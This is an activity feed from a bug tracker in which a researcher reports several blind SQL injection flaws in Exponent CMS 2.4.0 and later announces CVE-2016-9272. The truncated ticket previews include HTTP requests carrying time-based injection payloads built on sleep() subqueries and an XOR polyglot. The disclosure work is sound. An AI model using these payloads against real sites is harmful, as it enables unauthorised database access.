Lighthouse has a new layout. Prefer the old one? Return to the old layout, and switch back any time from the link at the top of each page.

Nicky's latest activity

Friday, November 11 2016
1394 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4) was updated in Exponent CMS
  • Nicky
    Nicky commented at 6:20 AM

    Hi,
    I have successfully applied for a CVEID(CVE-2016-9272) for this SQL injection vulnerability.

    Credit:Nicky of Tencent Security Platform Department

    Thank you.

Wednesday, November 09 2016
1394 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4) was updated in Exponent CMS
  • Nicky
    Nicky commented at 3:13 AM

    Hi
    Can you help me to apply for a CVEID this vulnerability?

Sunday, November 06 2016
1395 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (5) was created in Exponent CMS
  • Nicky
    Nicky created the ticket at 7:46 AM

    POST /exponent/ HTTP/1.1
    Content-Length: 251
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.118.1:80/e...

1394 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (4) was created in Exponent CMS
  • Nicky
    Nicky created the ticket at 7:46 AM

    POST /exponent/ HTTP/1.1
    Content-Length: 268
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.118.1:80/e...

1393 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (3) was created in Exponent CMS
  • Nicky
    Nicky created the ticket at 7:45 AM

    GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%2...

Friday, November 04 2016
1391 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (2) was created in Exponent CMS
  • Nicky
    Nicky created the ticket at 2:33 AM

    GET /exponent/container/delete/id/(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/...

1390 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 was created in Exponent CMS
  • Nicky
    Nicky created the ticket at 2:32 AM

    POST /exponent/index.php HTTP/1.1
    Content-Length: 865
    Content-Type: multipart/form-data; boundary=-----Boundary_GXLNYFRMTV
    X-Requested-With: XMLHttpRequest
    Refe...